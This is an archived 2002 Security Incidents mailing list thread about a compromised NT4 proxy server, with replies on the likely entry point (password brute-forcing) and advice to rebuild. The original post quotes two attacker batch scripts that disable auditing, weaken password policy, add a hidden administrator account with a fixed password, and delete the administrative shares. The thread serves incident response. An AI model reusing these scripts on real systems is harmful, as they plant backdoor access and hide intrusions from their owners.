Security Incidents mailing list archives

RE: Proxy server hit... Any ideas?

From: "darroch royden" <darroch.royden () blueyonder co uk>
Date: Wed, 20 Nov 2002 12:34:27 -0000

A favourite tool is xscan (xfocus.org), which among other
options/plugins you can choose ntpass which brute forces bad passwords
on the remote machine. I would imagine, especially since they are
removing the hidden shares that this is how they penetrated the machine.

Hope this helps.

-----Original Message-----
From: Mike Cain [mailto:mikec () lpinsurance com] 
Sent: 19 November 2002 9:29 PM
To: incidents () securityfocus com
Subject: RE: Proxy server hit... Any ideas?


I was really more looking for suggestions on 'how' the guy got in, and
if it matched any known exploits. First off, I didn't build the box, and
it wasn't my responsibility until about 3 weeks ago. Secondly, I do know
a good bit about hardening a box, so I am in the process of rebuilding
the Proxy to my specs (No FTP is DEFINITELY one of them since this
company doesn't use FTP). 
Thanks for the help though.... such as it was...

Mike Cain


-----Original Message-----
From: Russell Harding [mailto:hardingr () cunap com] 
Sent: Tuesday, November 19, 2002 3:04 PM
To: Mike Cain
Cc: incidents () securityfocus com
Subject: Re: Proxy server hit... Any ideas?

Mike,

  It seems like you've been gotten one of the many so called 'hackers'
who troll the internet looking for unpatched NT boxen to use as rogue
FTP
(music/warez/movie) servers.

  The incidents list sees this sort of post about once a week... "I run
NT, don't know security and got hit...what did I get?"

  I could be just another person to direct you to the same sources the
list always does (netstat, fport, etc...) But I would like to recommend
the following:

  With an unknown backdoor installed on your system, you really can
never know if you've eradicated the intruder.  It is best to not really
worry about what is there (keep the 'pirates booty' if you wish :) ) But
focus on what to do about it.  You need to re-format your drive, start
from scratch with the machine _off_ the public internet until it is
fully patched.  Don't always trust windows update to keep you patched...
It may help you to use a third party utility.

   Good luck rebuilding your system,
         -Russell


On Mon, 18 Nov 2002, Mike Cain wrote:

Well, I have had my first run-in with a hacker, or was it a virus? I'm

not 100% sure.. Guess I should start from the beginning...

A days ago, I began to get user complaints on the slowness of the 
internet. I figured it was mostly them just wanting something to 
complain about, so I did what all crappy admins do, I ignored it.

Well,

last night the box was rebooted after some software was updated. Today

people were complaining about how PAINFULLY slow the internet was, so

looked at the proxy server. NT4 running proxy3. I know, there is newer

better stuff, but its what I have to work with. :) SO... I looked at

the

processes and noticed the CPU hovering at 35-50%.. Way too high. So a 
quick look at the process list showed two things that I didn't

remember

needing to be there, win.exe and start.exe. Next move was to find

them,

and they were in the winnt\system\ folder. What I also found odd was 
that there were three new folders in that directory all created on the

8th, NT, tools, and win.

Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a 
backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll,

1ygwin1.dll

(says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, 
srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility

Routine), and _zoLibr.dll

3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, 
x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll, 
win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the

sercure

and secure1 batch files, it looks like a root kit... But I'mm new at 
this side of security I'mm aCiscoo guy...)

Last thing, the logs show that the attacker was hitting the 
\scripts\sample\ folder... Meaning I think he was trying to use the

old

IIS Sample Scripts to execute local code... Not sure if he was 
successful...

Thanks in advance!!

Mike Cain
CCNP/MCSE


Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000

Professional)

temp

echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo

machine\system\currentcontrolset\services\netlogon\parameters\signsecure

channel=4,1 >> temp
echo

machine\system\currentcontrolset\services\netlogon\parameters\sealsecure

channel=4,1 >> temp
echo

machine\system\currentcontrolset\services\netlogon\parameters\requirestr

ongkey=4,0 >> temp
echo

machine\system\currentcontrolset\services\netlogon\parameters\requiresig

norseal=4,0 >> temp
echo

machine\system\currentcontrolset\services\netlogon\parameters\disablepas

swordchange=4,0 >> temp
echo

machine\system\currentcontrolset\services\lanmanworkstation\parameters\r

equiresecuritysignature=4,0 >> temp
echo

machine\system\currentcontrolset\services\lanmanworkstation\parameters\e

nablesecuritysignature=4,1 >> temp
echo

machine\system\currentcontrolset\services\lanmanworkstation\parameters\e

nableplaintextpassword=4,0 >> temp
echo

machine\system\currentcontrolset\services\lanmanserver\parameters\requir

esecuritysignature=4,0 >> temp
echo

machine\system\currentcontrolset\services\lanmanserver\parameters\enable

securitysignature=4,0 >> temp
echo

machine\system\currentcontrolset\services\lanmanserver\parameters\enable

forcedlogoff=4,1 >> temp
echo

machine\system\currentcontrolset\services\lanmanserver\parameters\autodi

sconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session
manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory 
management\clearpagefileatshutdown=4,0 >> temp echo 
machine\system\currentcontrolset\control\print\providers\lanman
print services\servers\addprinterdrivers=4,0 >> temp
echo

machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0

temp

echo 
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0

temp
echo 
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0

temp

echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0

temp

echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0

temp

echo

machine\software\microsoft\windows\currentversion\policies\system\shutdo

wnwithoutlogon=4,1 >> temp
echo

machine\software\microsoft\windows\currentversion\policies\system\legaln

oticetext=1, >> temp
echo

machine\software\microsoft\windows\currentversion\policies\system\legaln

oticecaption=1, >> temp
echo

machine\software\microsoft\windows\currentversion\policies\system\dontdi

splaylastusername=4,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp echo 
machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp echo 
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp echo 
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp echo

[Privilege Rights] >> temp echo seassignprimarytokenprivilege = >> 
temp echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >>

temp

echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp echo 
seincreasequotaprivilege = *S-1-5-32-544 >> temp echo 
seinteractivelogonright =

*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040

8961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> 
temp echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >>
temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb
/CFG temp
echo System is now secure.



Secure1.bat

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld

------------------------------------------------------------------------
----

This list is provided by the SecurityFocus ARIS analyzer service. For 
more information on this free incident handling, management and 
tracking system please see: http://aris.securityfocus.com




------------------------------------------------------------------------
----
This list is provided by the SecurityFocus ARIS analyzer service. For
more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Proxy server hit... Any ideas? Mike Cain (Nov 19)
- Re: Proxy server hit... Any ideas? Hugo van der Kooij (Nov 20)
- RE: Proxy server hit... Any ideas? ZeroBreak (Nov 22)
- Re: Proxy server hit... Any ideas? Russell Harding (Nov 22)
  - RE: Proxy server hit... Any ideas? Mike Cain (Nov 20)
    - RE: Proxy server hit... Any ideas? darroch royden (Nov 21)
  - Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 21)
    - Re: Proxy server hit... Any ideas? Emeric Miszti (Nov 23)
    - Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 24)
    - Message not available
    - Re: Proxy server hit... Any ideas? Valdis . Kletnieks (Nov 25)
- <Possible follow-ups>
- RE: Proxy server hit... Any ideas? Othenin-Girard Pascal (Nov 21)
- RE: Proxy server hit... Any ideas? Mike Cain (Nov 22)
  - RE: Proxy server hit... Any ideas? Alvin Oga (Nov 25)
  - RE: Proxy server hit... Any ideas? Captain James T Kirk (Nov 25)
  - Re: Proxy server hit... Any ideas? Etaoin Shrdlu (Nov 25)
  - RE: Proxy server hit... Any ideas? Jonathan Bloomquist (Nov 25)

(Thread continues...)